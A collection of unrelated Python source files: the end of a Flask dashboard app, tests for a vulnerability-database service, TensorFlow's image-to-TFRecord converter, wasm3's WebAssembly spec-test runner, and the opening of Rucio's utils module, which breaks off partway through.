return render_template('dashboard/upload.html')
return render_template('dashboard/upload.html')
@app.route('/history')
@login_required
def history():
return render_template('dashboard/history.html', name=current_user.username)
@app.route('/profile')
@login_required
def profile():
return render_template('dashboard/profile.html', name=current_user.username, email=current_user.email, faculty=current_user.faculty)
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('index'))
if __name__ == '__main__':
app.run(debug=True)
|
test_database_service.py
|
from __future__ import absolute_import
from unittest import TestCase
from database.memory_db import MemoryDB
from database.database_service import database_service
from database.database_service import DBClient
from service.server import config
import time, ast, os, json, requests
from multiprocessing import Process
class TestDBComponents(TestCase):
@classmethod
def setUpClass(self):
self.process = Process(target=database_service)
self.process.start()
time.sleep(2)
self.client = DBClient(config["database"])
self.DB = MemoryDB()
@classmethod
def tearDownClass(self):
os.system("kill " + str(self.process.pid))
time.sleep(2)
# Basically all tests are checking if making a query through the component DBPrivileges
# gives the same result as querying the database directly
def test_privileges_none(self):
a = self.DB.get_privileges('libguestfs', '1.21.24')
b = self.client.db_request("/privileges", 'libguestfs', '1.21.24')
self.assertEqual(a, b)
def test_privileges_all(self):
a = self.DB.get_privileges('windows_2000', '*')
b = self.client.db_request("/privileges", 'windows_2000', '*')
self.assertEqual(a, b)
# Basically all tests are checking if making a query through the component DBQuery
# gives the same result as querying the database directly
def test_query_simple(self):
a = self.DB.query('libguestfs', '1.21.24')
b = self.client.db_request("/vulnerability", 'libguestfs', '1.21.24')
self.assertEqual(a, b)
def test_query_2002(self):
for version in ['1.0', '1.1', '2.1.5', '2.2.4']:
a = self.DB.query('freebsd', version)
b = self.client.db_request("/vulnerability", 'freebsd', version)
self.assertEqual(a, b)
def test_query_2007(self):
for version in ['3.0', '4.0']:
a = self.DB.query('metaframe', version)
b = self.client.db_request("/vulnerability", 'metaframe', version)
self.assertEqual(a, b)
|
build_image_data.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts image data to TFRecords file format with Example protos.
The image data set is expected to reside in JPEG files located in the
following directory structure.
data_dir/label_0/image0.jpeg
data_dir/label_0/image1.jpg
...
data_dir/label_1/weird-image.jpeg
data_dir/label_1/my-image.jpeg
...
where the sub-sirectory is the unique label associated with these images.
This TensorFlow script converts the training and evaluation data into
a sharded data set consisting of TFRecord files
train_directory/train-00000-of-01024
train_directory/train-00001-of-01024
...
train_directory/train-00127-of-01024
and
validation_directory/validation-00000-of-00128
validation_directory/validation-00001-of-00128
...
validation_directory/validation-00127-of-00128
where we have selected 1024 and 128 shards for each data set. Each record
within the TFRecord file is a serialized Example proto. The Example proto
contains the following fields:
image/encoded: string containing JPEG encoded image in RGB colorspace
image/height: integer, image height in pixels
image/width: integer, image width in pixels
image/colorspace: string, specifying the colorspace, always 'RGB'
image/channels: integer, specifying the number of channels, always 3
image/format: string, specifying the format, always'JPEG'
image/filename: string containing the basename of the image file
e.g. 'n01440764_10026.JPEG' or 'ILSVRC2012_val_00000293.JPEG'
image/class/label: integer specifying the index in a classification layer.
The label ranges from [0, num_labels] where 0 is unused and left as
the background class.
image/class/text: string specifying the human-readable version of the label
e.g. 'dog'
If you data set involves bounding boxes, please look at build_imagenet_data.py.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os
import random
import sys
import threading
import numpy as np
import tensorflow as tf
tf.app.flags.DEFINE_string('train_directory', '/tmp/',
'Training data directory')
tf.app.flags.DEFINE_string('validation_directory', '/tmp/',
'Validation data directory')
tf.app.flags.DEFINE_string('output_directory', '/tmp/',
'Output data directory')
tf.app.flags.DEFINE_integer('train_shards', 2,
'Number of shards in training TFRecord files.')
tf.app.flags.DEFINE_integer('validation_shards', 2,
'Number of shards in validation TFRecord files.')
tf.app.flags.DEFINE_integer('num_threads', 2,
'Number of threads to preprocess the images.')
# The labels file contains a list of valid labels are held in this file.
# Assumes that the file contains entries as such:
# dog
# cat
# flower
# where each line corresponds to a label. We map each label contained in
# the file to an integer corresponding to the line number starting from 0.
tf.app.flags.DEFINE_string('labels_file', 'labels_file.txt', 'Labels file')
FLAGS = tf.app.flags.FLAGS
def _int64_feature(value):
"""Wrapper for inserting int64 features into Example proto."""
if not isinstance(value, list):
value = [value]
return tf.train.Feature(int64_list=tf.train.Int64List(value=value))
def _bytes_feature(value):
"""Wrapper for inserting bytes features into Example proto."""
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _convert_to_example(filename, image_buffer, label, text, height, width):
"""Build an Example proto for an example.
Args:
filename: string, path to an image file, e.g., '/path/to/example.JPG'
image_buffer: string, JPEG encoding of RGB image
label: integer, identifier for the ground truth for the network
text: string, unique human-readable, e.g. 'dog'
height: integer, image height in pixels
width: integer, image width in pixels
Returns:
Example proto
"""
colorspace = b'RGB'
channels = 3
image_format = b'JPEG'
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': _int64_feature(height),
'image/width': _int64_feature(width),
'image/colorspace': _bytes_feature(colorspace),
'image/channels': _int64_feature(channels),
'image/class/label': _int64_feature(label),
'image/class/text': _bytes_feature(text.encode()),
'image/format': _bytes_feature(image_format),
'image/filename': _bytes_feature(os.path.basename(filename).encode()),
'image/encoded': _bytes_feature(image_buffer)}))
return example
class ImageCoder(object):
"""Helper class that provides TensorFlow image coding utilities."""
def __init__(self):
# Create a single Session to run all image coding calls.
self._sess = tf.Session()
# Initializes function that converts PNG to JPEG data.
self._png_data = tf.placeholder(dtype=tf.string)
image = tf.image.decode_png(self._png_data, channels=3)
self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)
# Initializes function that decodes RGB JPEG data.
self._decode_jpeg_data = tf.placeholder(dtype=tf.string)
self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)
def png_to_jpeg(self, image_data):
return self._sess.run(self._png_to_jpeg, feed_dict={self._png_data: image_data})
def decode_jpeg(self, image_data):
image = self._sess.run(self._decode_jpeg, feed_dict={self._decode_jpeg_data: image_data})
assert len(image.shape) == 3
assert image.shape[2] == 3
return image
def _is_png(filename):
"""Determine if a file contains a PNG format image.
Args:
filename: string, path of the image file.
Returns:
boolean indicating if the image is a PNG.
"""
return '.png' in filename
def _process_image(filename, coder):
"""Process a single image file.
Args:
filename: string, path to an image file e.g., '/path/to/example.JPG'.
coder: instance of ImageCoder to provide TensorFlow image coding utils.
Returns:
image_buffer: string, JPEG encoding of RGB image.
height: integer, image height in pixels.
width: integer, image width in pixels.
"""
# Read the image file.
image_data = tf.gfile.FastGFile(filename, 'rb').read()
# Convert any PNG to JPEG's for consistency.
if _is_png(filename):
print('Converting PNG to JPEG for %s' % filename)
image_data = coder.png_to_jpeg(image_data)
# Decode the RGB JPEG.
image = coder.decode_jpeg(image_data)
# Check that image converted to RGB
assert len(image.shape) == 3
height = image.shape[0]
width = image.shape[1]
assert image.shape[2] == 3
return image_data, height, width
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
texts, labels, num_shards):
"""Processes and saves list of images as TFRecord in 1 thread.
Args:
coder: instance of ImageCoder to provide TensorFlow image coding utils.
thread_index: integer, unique batch to run index is within [0, len(ranges)).
ranges: list of pairs of integers specifying ranges of each batches to
analyze in parallel.
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
# Each thread produces N shards where N = int(num_shards / num_threads).
# For instance, if num_shards = 128, and the num_threads = 2, then the first
# thread would produce shards [0, 64).
num_threads = len(ranges)
assert not num_shards % num_threads
num_shards_per_batch = int(num_shards / num_threads)
shard_ranges = np.linspace(ranges[thread_index][0],
ranges[thread_index][1],
num_shards_per_batch + 1).astype(int)
num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]
counter = 0
for s in range(num_shards_per_batch):
# Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
shard = thread_index * num_shards_per_batch + s
output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
output_file = os.path.join(FLAGS.output_directory, output_filename)
writer = tf.python_io.TFRecordWriter(output_file)
shard_counter = 0
files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
for i in files_in_shard:
filename = filenames[i]
label = labels[i]
text = texts[i]
image_buffer, height, width = _process_image(filename, coder)
example = _convert_to_example(filename, image_buffer, label,
text, height, width)
writer.write(example.SerializeToString())
shard_counter += 1
counter += 1
if not counter % 1000:
print('%s [thread %d]: Processed %d of %d images in thread batch.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
print('%s [thread %d]: Wrote %d images to %s' %
(datetime.now(), thread_index, shard_counter, output_file))
sys.stdout.flush()
shard_counter = 0
print('%s [thread %d]: Wrote %d images to %d shards.' %
(datetime.now(), thread_index, counter, num_files_in_thread))
sys.stdout.flush()
def _process_image_files(name, filenames, texts, labels, num_shards):
"""Process and save list of images as TFRecord of Example protos.
Args:
name: string, unique identifier specifying the data set
filenames: list of strings; each string is a path to an image file
texts: list of strings; each string is human readable, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth
num_shards: integer number of shards for this data set.
"""
assert len(filenames) == len(texts)
assert len(filenames) == len(labels)
# Break all images into batches with a [ranges[i][0], ranges[i][1]].
spacing = np.linspace(0, len(filenames), FLAGS.num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i+1]])
# Launch a thread for each batch.
print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges))
sys.stdout.flush()
# Create a mechanism for monitoring when all threads are finished.
coord = tf.train.Coordinator()
# Create a generic TensorFlow-based utility for converting all image codings.
coder = ImageCoder()
threads = []
for thread_index in range(len(ranges)):
args = (coder, thread_index, ranges, name, filenames, texts, labels, num_shards)
t = threading.Thread(target=_process_image_files_batch, args=args)
t.start()
threads.append(t)
# Wait for all the threads to terminate.
coord.join(threads)
print('%s: Finished writing all %d images in data set.' %
(datetime.now(), len(filenames)))
sys.stdout.flush()
def _find_image_files(data_dir, labels_file):
"""Build a list of all images files and labels in the data set.
Args:
data_dir: string, path to the root directory of images.
Assumes that the image data set resides in JPEG files located in
the following directory structure.
data_dir/dog/another-image.JPEG
data_dir/dog/my-image.jpg
where 'dog' is the label associated with these images.
labels_file: string, path to the labels file.
The list of valid labels are held in this file. Assumes that the file
contains entries as such:
dog
cat
flower
where each line corresponds to a label. We map each label contained in
the file to an integer starting with the integer 0 corresponding to the
label contained in the first line.
Returns:
filenames: list of strings; each string is a path to an image file.
texts: list of strings; each string is the class, e.g. 'dog'
labels: list of integer; each integer identifies the ground truth.
"""
print('Determining list of input files and labels from %s.' % data_dir)
unique_labels = [l.strip() for l in tf.gfile.FastGFile(labels_file, 'r').readlines()]
labels = []
filenames = []
texts = []
# Leave label index 0 empty as a background class.
label_index = 1
# Construct the list of JPEG files and labels.
for text in unique_labels:
jpeg_file_path = '%s/%s/*' % (data_dir, text)
print(jpeg_file_path)
matching_files = tf.gfile.Glob(jpeg_file_path)
labels.extend([label_index] * len(matching_files))
texts.extend([text] * len(matching_files))
filenames.extend(matching_files)
if not label_index % 100:
print('Finished finding files in %d of %d classes.' % (
label_index, len(labels)))
label_index += 1
# Shuffle the ordering of all image files in order to guarantee
# random ordering of the images with respect to label in the
# saved TFRecord files. Make the randomization repeatable.
shuffled_index = list(range(len(filenames)))
random.seed(12345)
random.shuffle(shuffled_index)
filenames = [filenames[i] for i in shuffled_index]
texts = [texts[i] for i in shuffled_index]
labels = [labels[i] for i in shuffled_index]
print('Found %d JPEG files across %d labels inside %s.' %
(len(filenames), len(unique_labels), data_dir))
return filenames, texts, labels
def _process_dataset(name, directory, num_shards, labels_file):
"""Process a complete data set and save it as a TFRecord.
Args:
name: string, unique identifier specifying the data set.
directory: string, root path to the data set.
num_shards: integer number of shards for this data set.
labels_file: string, path to the labels file.
"""
filenames, texts, labels = _find_image_files(directory, labels_file)
_process_image_files(name, filenames, texts, labels, num_shards)
def main(unused_argv):
assert not FLAGS.train_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with FLAGS.train_shards')
assert not FLAGS.validation_shards % FLAGS.num_threads, (
'Please make the FLAGS.num_threads commensurate with '
'FLAGS.validation_shards')
print('Saving results to %s' % FLAGS.output_directory)
# Run it!
_process_dataset('validation', FLAGS.validation_directory, FLAGS.validation_shards, FLAGS.labels_file)
_process_dataset('train', FLAGS.train_directory, FLAGS.train_shards, FLAGS.labels_file)
if __name__ == '__main__':
tf.app.run()
|
run-spec-test.py
|
#!/usr/bin/env python3
# Author: Volodymyr Shymanskyy
# Usage:
# ./run-spec-test.py
# ./run-spec-test.py ./core/i32.json
# ./run-spec-test.py ./core/float_exprs.json --line 2070
# ./run-spec-test.py ./proposals/tail-call/*.json
# ./run-spec-test.py --exec "../build-custom/wasm3 --repl"
#
# Running WASI verison with different engines:
# cp ../build-wasi/wasm3.wasm ./
# ./run-spec-test.py --exec "../build/wasm3 wasm3.wasm --repl"
# ./run-spec-test.py --exec "wasmtime --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer run --dir=. --backend=llvm wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "wasmer-js run wasm3.wasm --dir=. -- --repl"
# ./run-spec-test.py --exec "wasirun wasm3.wasm --repl"
# ./run-spec-test.py --exec "wavm run --mount-root ./ wasm3.wasm -- --repl"
# ./run-spec-test.py --exec "iwasm --dir=. wasm3.wasm --repl"
#
# TODO
# - Get more tests from: https://github.com/microsoft/ChakraCore/tree/master/test/WasmSpec
# - Fix "Empty Stack" check
# - Check Canonical NaN and Arithmetic NaN separately
# - Fix imports.wast
import argparse
import os, sys, glob, time
import subprocess
import json
import re
import struct
import math
import pathlib
scriptDir = os.path.dirname(os.path.abspath(sys.argv[0]))
sys.path.append(os.path.join(scriptDir, '..', 'extra'))
from testutils import *
from pprint import pprint
#
# Args handling
#
parser = argparse.ArgumentParser()
parser.add_argument("--exec", metavar="<interpreter>", default="../build/wasm3 --repl")
parser.add_argument("--timeout", type=int, default=30)
parser.add_argument("--line", metavar="<source line>", type=int)
parser.add_argument("--all", action="store_true")
parser.add_argument("--show-logs", action="store_true")
parser.add_argument("--format", choices=["raw", "hex", "fp"], default="fp")
parser.add_argument("-v", "--verbose", action="store_true")
parser.add_argument("-s", "--silent", action="store_true")
parser.add_argument("file", nargs='*')
args = parser.parse_args()
if args.line:
args.show_logs = True
#
# Utilities
#
log = open("spec-test.log","w+")
log.write("======================\n")
def warning(msg):
log.write("Warning: " + msg + "\n")
log.flush()
if args.verbose:
print(f"{ansi.WARNING}Warning:{ansi.ENDC} {msg}")
def fatal(msg):
log.write("Fatal: " + msg + "\n")
log.flush()
print(f"{ansi.FAIL}Fatal:{ansi.ENDC} {msg}")
sys.exit(1)
def binaryToFloat(num, t):
if t == "f32":
return struct.unpack('!f', struct.pack('!L', int(num)))[0]
elif t == "f64":
return struct.unpack('!d', struct.pack('!Q', int(num)))[0]
else:
fatal(f"Unknown type '{t}'")
def escape_str(s):
if s == "":
return r'\x00'
if all((ord(c) < 128 and c.isprintable() and not c in " \n\r\t\\") for c in s):
return s
return '\\x' + '\\x'.join('{0:02x}'.format(x) for x in s.encode('utf-8'))
#
# Value format options
#
def formatValueRaw(num, t):
return str(num)
def formatValueHex(num, t):
if t == "f32" or t == "i32":
return "{0:#0{1}x}".format(int(num), 8+2)
elif t == "f64" or t == "i64":
return "{0:#0{1}x}".format(int(num), 16+2)
else:
return str(num)
def formatValueFloat(num, t):
if t == "f32":
s = 6
elif t == "f64":
s = 10
else:
return str(num)
result = "{0:.{1}f}".format(binaryToFloat(num, t), s).rstrip('0')
if result.endswith('.'): result = result + '0'
if len(result) > s*2:
result = "{0:.{1}e}".format(binaryToFloat(num, t), s)
return result
formaters = {
'raw': formatValueRaw,
'hex': formatValueHex,
'fp': formatValueFloat,
}
formatValue = formaters[args.format]
if args.format == "fp":
print("When using fp display format, values are compared loosely (some tests may produce false positives)")
#
# Spec tests preparation
#
if not (os.path.isdir("./core") and os.path.isdir("./proposals")):
from io import BytesIO
from zipfile import ZipFile
from urllib.request import urlopen
officialSpec = "https://github.com/wasm3/wasm-core-testsuite/archive/v1.1.zip"
print(f"Downloading {officialSpec}")
resp = urlopen(officialSpec)
with ZipFile(BytesIO(resp.read())) as zipFile:
for zipInfo in zipFile.infolist():
if re.match(r".*-.*/.*/.*(\.wasm|\.json)", zipInfo.filename):
parts = pathlib.Path(zipInfo.filename).parts
newpath = str(pathlib.Path(*parts[1:-1]))
newfn = str(pathlib.Path(*parts[-1:]))
ensure_path(newpath)
newpath = newpath + "/" + newfn
zipInfo.filename = newpath
zipFile.extract(zipInfo)
#
# Wasm3 REPL
#
from subprocess import Popen, STDOUT, PIPE
from threading import Thread
from queue import Queue, Empty
import shlex
class Wasm3():
def __init__(self, exe):
self.exe = exe
self.p = None
self.loaded = None
self.timeout = args.timeout
self.autorestart = True
self.run()
def run(self):
if self.p:
self.terminate()
cmd = shlex.split(self.exe)
#print(f"wasm3: Starting {' '.join(cmd)}")
self.q = Queue()
self.p = Popen(cmd, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT)
def _read_output(out, queue):
for data in iter(lambda: out.read(1024), b''):
queue.put(data)
queue.put(None)
self.t = Thread(target=_read_output, args=(self.p.stdout, self.q))
self.t.daemon = True
self.t.start()
try:
self._read_until("wasm3> ")
except Exception as e:
print(f"wasm3: Could not start: {e}")
def restart(self):
print(f"wasm3: Restarting")
for i in range(10):
try:
self.run()
try:
if self.loaded:
self.load(self.loaded)
except Exception as e:
pass
break
except Exception as e:
print(f"wasm3: {e} => retry")
time.sleep(0.1)
def init(self):
return self._run_cmd(f":init\n")
def version(self):
return self._run_cmd(f":version\n")
def load(self, fn):
# WAVM mounts root, so it expects an absolute path
if "wavm run" in self.exe:
fn = "/" + fn
self.loaded = None
res = self._run_cmd(f":load {fn}\n")
self.loaded = fn
return res
def invoke(self, cmd):
return self._run_cmd(" ".join(map(str, cmd)) + "\n")
def _run_cmd(self, cmd):
if self.autorestart and not self._is_running():
self.restart()
self._flush_input()
#print(f"wasm3: {cmd.strip()}")
self._write(cmd)
return self._read_until("wasm3> ")
def _read_until(self, token):
buff = ""
tout = time.time() + self.timeout
error = None
while time.time() < tout:
try:
data = self.q.get(timeout=0.1)
if data == None:
error = "Crashed"
break
buff = buff + data.decode("utf-8")
idx = buff.rfind(token)
if idx >= 0:
return buff[0:idx].strip()
except Empty:
pass
else:
error = "Timeout"
self.terminate()
raise Exception(error)
def _write(self, data):
self.p.stdin.write(data.encode("utf-8"))
self.p.stdin.flush()
def _is_running(self):
return self.p and (self.p.poll() == None)
def _flush_input(self):
while not self.q.empty():
self.q.get()
def terminate(self):
self.p.stdin.close()
self.p.terminate()
self.p.wait(timeout=1.0)
self.p = None
#
# Actual test
#
wasm3 = Wasm3(args.exec)
wasm3_ver = wasm3.version()
print(wasm3_ver)
blacklist = Blacklist([
"float_exprs.wast:* f32.nonarithmetic_nan_bitpattern*",
"imports.wast:*",
"names.wast:* *.wasm \\x00*", # names that start with '\0'
])
if wasm3_ver in Blacklist(["* MSVC *, x86)", "* Clang * for Windows, x86)"]):
warning("Win32 x86 has i64->f32 conversion precision issues, skipping some tests")
# See: https://docs.microsoft.com/en-us/cpp/c-runtime-library/floating-point-support
blacklist.add([
"conversions.wast:* f32.convert_i64_u(9007199791611905)",
"conversions.wast:* f32.convert_i64_u(9223371761976868863)",
"conversions.wast:* f32.convert_i64_u(9223372586610589697)",
])
elif wasm3_ver in Blacklist(["* GCC *, mips*"]):
warning("MIPS has NaN representation issues, skipping some tests")
blacklist.add([
"float_exprs.wast:* *_nan_bitpattern(*",
"float_exprs.wast:* *no_fold_*",
])
elif wasm3_ver in Blacklist(["* GCC *, sparc*"]):
warning("SPARC has NaN representation issues, skipping some tests")
blacklist.add([
"float_exprs.wast:* *.canonical_nan_bitpattern(0, 0)",
])
stats = dotdict(total_run=0, skipped=0, failed=0, crashed=0, timeout=0, success=0, missing=0)
# Convert some trap names from the original spec
trapmap = {
"unreachable": "unreachable executed"
}
def runInvoke(test):
test.cmd = [test.action.field]
displayArgs = []
for arg in test.action.args:
test.cmd.append(arg['value'])
displayArgs.append(formatValue(arg['value'], arg['type']))
test_id = f"{test.source} {test.wasm} {test.cmd[0]}({', '.join(test.cmd[1:])})"
if test_id in blacklist and not args.all:
warning(f"Skipped {test_id} (blacklisted)")
stats.skipped += 1
return
if args.verbose:
print(f"Running {test_id}")
stats.total_run += 1
output = ""
actual = None
actual_val = None
force_fail = False
try:
output = wasm3.invoke(test.cmd)
except Exception as e:
actual = f"<{e}>"
force_fail = True
# Parse the actual output
if not actual:
result = re.findall(r'Result: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "result " + result[-1]
actual_val = result[0]
if not actual:
result = re.findall(r'Error: \[trap\] (.*?) \(', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "trap " + result[-1]
if not actual:
result = re.findall(r'Error: (.*?)$', "\n" + output + "\n", re.MULTILINE)
if len(result) > 0:
actual = "error " + result[-1]
if not actual:
actual = "<No Result>"
force_fail = True
if actual == "error no operation ()":
actual = "<Not Implemented>"
stats.missing += 1
force_fail = True
elif actual == "<Crashed>":
stats.crashed += 1
force_fail = True
elif actual == "<Timeout>":
stats.timeout += 1
force_fail = True
# Prepare the expected result
expect = None
if "expected" in test:
if len(test.expected) == 0:
expect = "result <Empty Stack>"
elif len(test.expected) == 1:
t = test.expected[0]['type']
value = str(test.expected[0]['value'])
expect = "result " + value
if actual_val != None:
if (t == "f32" or t == "f64") and (value == "nan:canonical" or value == "nan:arithmetic"):
val = binaryToFloat(actual_val, t)
#warning(f"{actual_val} => {val}")
if math.isnan(val):
actual = "nan:any"
expect = "nan:any"
else:
expect = "result " + formatValue(value, t)
actual = "result " + formatValue(actual_val, t)
else:
warning(f"Test {test.source} specifies multiple results")
expect = "result <Multiple>"
elif "expected_trap" in test:
if test.expected_trap in trapmap:
test.expected_trap = trapmap[test.expected_trap]
expect = "trap " + str(test.expected_trap)
elif "expected_anything" in test:
expect = "<Anything>"
else:
expect = "<Unknown>"
def showTestResult():
print(" ----------------------")
print(f"Test: {ansi.HEADER}{test_id}{ansi.ENDC}")
print(f"Args: {', '.join(displayArgs)}")
print(f"Expected: {ansi.OKGREEN}{expect}{ansi.ENDC}")
print(f"Actual: {ansi.WARNING}{actual}{ansi.ENDC}")
if args.show_logs and len(output):
print(f"Log:")
print(output)
log.write(f"{test.source}\t|\t{test.wasm} {test.action.field}({', '.join(displayArgs)})\t=>\t\t")
if actual == expect or (expect == "<Anything>" and not force_fail):
stats.success += 1
log.write(f"OK: {actual}\n")
if args.line:
showTestResult()
else:
stats.failed += 1
log.write(f"FAIL: {actual}, should be: {expect}\n")
if args.silent: return
showTestResult()
#sys.exit(1)
if args.file:
jsonFiles = args.file
else:
jsonFiles = glob.glob(os.path.join(".", "core", "*.json"))
jsonFiles += glob.glob(os.path.join(".", "proposals", "sign-extension-ops", "*.json"))
jsonFiles += glob.glob(os.path.join(".", "proposals", "nontrapping-float-to-int-conversions", "*.json"))
jsonFiles = list(map(lambda x: os.path.relpath(x, scriptDir), jsonFiles))
jsonFiles.sort()
for fn in jsonFiles:
with open(fn, encoding='utf-8') as f:
data = json.load(f)
wast_source = filename(data["source_filename"])
wasm_module = ""
print(f"Running {fn}")
wasm3.init()
for cmd in data["commands"]:
test = dotdict()
test.line = int(cmd["line"])
test.source = wast_source + ":" + str(test.line)
test.wasm = wasm_module
test.type = cmd["type"]
if test.type == "module":
wasm_module = cmd["filename"]
if args.verbose:
print(f"Loading {wasm_module}")
try:
wasm_fn = os.path.join(pathname(fn), wasm_module)
wasm3.load(wasm_fn)
except Exception as e:
pass #fatal(str(e))
elif ( test.type == "action" or
test.type == "assert_return" or
test.type == "assert_trap" or
test.type == "assert_exhaustion" or
test.type == "assert_return_canonical_nan" or
test.type == "assert_return_arithmetic_nan"):
if args.line and test.line != args.line:
continue
if test.type == "action":
test.expected_anything = True
elif test.type == "assert_return":
test.expected = cmd["expected"]
elif test.type == "assert_return_canonical_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:canonical"
elif test.type == "assert_return_arithmetic_nan":
test.expected = cmd["expected"]
test.expected[0]["value"] = "nan:arithmetic"
elif test.type == "assert_trap":
test.expected_trap = cmd["text"]
elif test.type == "assert_exhaustion":
test.expected_trap = "stack overflow"
else:
stats.skipped += 1
warning(f"Skipped {test.source} ({test.type} not implemented)")
continue
test.action = dotdict(cmd["action"])
if test.action.type == "invoke":
# TODO: invoking in modules not implemented
if test.action.module:
stats.skipped += 1
warning(f"Skipped {test.source} (invoke in module)")
continue
test.action.field = escape_str(test.action.field)
runInvoke(test)
else:
stats.skipped += 1
warning(f"Skipped {test.source} (unknown action type '{test.action.type}')")
# These are irrelevant
elif (test.type == "assert_invalid" or
test.type == "assert_malformed" or
test.type == "assert_uninstantiable"):
pass
# Others - report as skipped
else:
stats.skipped += 1
warning(f"Skipped {test.source} ('{test.type}' not implemented)")
if (stats.failed + stats.success) != stats.total_run:
warning("Statistics summary invalid")
pprint(stats)
if stats.failed > 0:
failed = (stats.failed*100)/stats.total_run
print(f"{ansi.FAIL}=======================")
print(f" FAILED: {failed:.2f}%")
if stats.crashed > 0:
print(f" Crashed: {stats.crashed}")
print(f"======================={ansi.ENDC}")
sys.exit(1)
elif stats.success > 0:
print(f"{ansi.OKGREEN}=======================")
print(f" {stats.success}/{stats.total_run} tests OK")
if stats.skipped > 0:
print(f"{ansi.WARNING} ({stats.skipped} tests skipped){ansi.OKGREEN}")
print(f"======================={ansi.ENDC}")
|
utils.py
|
# -*- coding: utf-8 -*-
# Copyright 2012-2021 CERN
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Vincent Garonne <vincent.garonne@cern.ch>, 2012-2018
# - Thomas Beermann <thomas.beermann@cern.ch>, 2012-2021
# - Mario Lassnig <mario.lassnig@cern.ch>, 2012-2021
# - Cedric Serfon <cedric.serfon@cern.ch>, 2013-2021
# - Ralph Vigne <ralph.vigne@cern.ch>, 2013
# - Joaquín Bogado <jbogado@linti.unlp.edu.ar>, 2015-2018
# - Martin Barisits <martin.barisits@cern.ch>, 2016-2021
# - Brian Bockelman <bbockelm@cse.unl.edu>, 2018
# - Tobias Wegner <twegner@cern.ch>, 2018-2019
# - Hannes Hansen <hannes.jakob.hansen@cern.ch>, 2018-2019
# - Tomas Javurek <tomas.javurek@cern.ch>, 2019-2020
# - Andrew Lister <andrew.lister@stfc.ac.uk>, 2019
# - James Perry <j.perry@epcc.ed.ac.uk>, 2019-2021
# - Gabriele Fronze' <gfronze@cern.ch>, 2019
# - Jaroslav Guenther <jaroslav.guenther@cern.ch>, 2019-2020
# - Eli Chadwick <eli.chadwick@stfc.ac.uk>, 2020
# - Patrick Austin <patrick.austin@stfc.ac.uk>, 2020
# - root <root@escape-rucio-dev-oidc-r.cern.ch>, 2020
# - Benedikt Ziemons <benedikt.ziemons@cern.ch>, 2020-2021
# - Mayank Sharma <mayank.sharma@cern.ch>, 2021
# - Rahul Chauhan <omrahulchauhan@gmail.com>, 2021
# - Radu Carpa <radu.carpa@cern.ch>, 2021
# - Anil Panta <47672624+panta-123@users.noreply.github.com>, 2021
# - Ilija Vukotic <ivukotic@cern.ch>, 2021
# - David Población Criado <david.poblacion.criado@cern.ch>, 2021
# - Joel Dierkes <joel.dierkes@cern.ch>, 2021
from __future__ import absolute_import, print_function
import argparse
import base64
import datetime
import errno
import getpass
import hashlib
import io
import itertools
import json
import logging
import mmap
import os
import os.path
import re
import socket
import subprocess
import tempfile
import threading
import time
import zlib
from collections import OrderedDict
from enum import Enum
from functools import partial
from uuid import uuid4 as uuid
from xml.etree import ElementTree
import requests
from six import string_types, text_type, binary_type, ensure_text, PY3
from six.moves import StringIO, zip_longest as izip_longest
from six.moves.urllib.parse import urlparse, urlencode, quote, parse_qsl, urlunparse
from six.moves.configparser import NoOptionError, NoSectionError
from rucio.common.config import config_get, config_has_section
from rucio.common.exception import MissingModuleException, InvalidType, InputValidationError, MetalinkJsonParsingError, RucioException, \
DuplicateCriteriaInDIDFilter, DIDFilterSyntaxError
from rucio.common.extra import import_extras
from rucio.common.types import InternalAccount, InternalScope
EXTRA_MODULES = import_extras(['paramiko'])
if EXTRA_MODULES['paramiko']:
try:
from paramiko import RSAKey
except Exception:
EXTRA_MODULES['paramiko'] = False
# HTTP code dictionary. Not complete. Can be extended if needed.
codes = {
# Informational.
200: '200 OK',
201: '201 Created',
202: '202 Accepted',
# Client Error.
400: '400 Bad Request',
401: '401 Unauthorized',
403: '403 Forbidden',
404: '404 Not Found',
405: '405 Method Not Allowed',
406: '406 Not Acceptable',
408: '408 Request Timeout',
409: '409 Conflict',
410: '410 Gone',
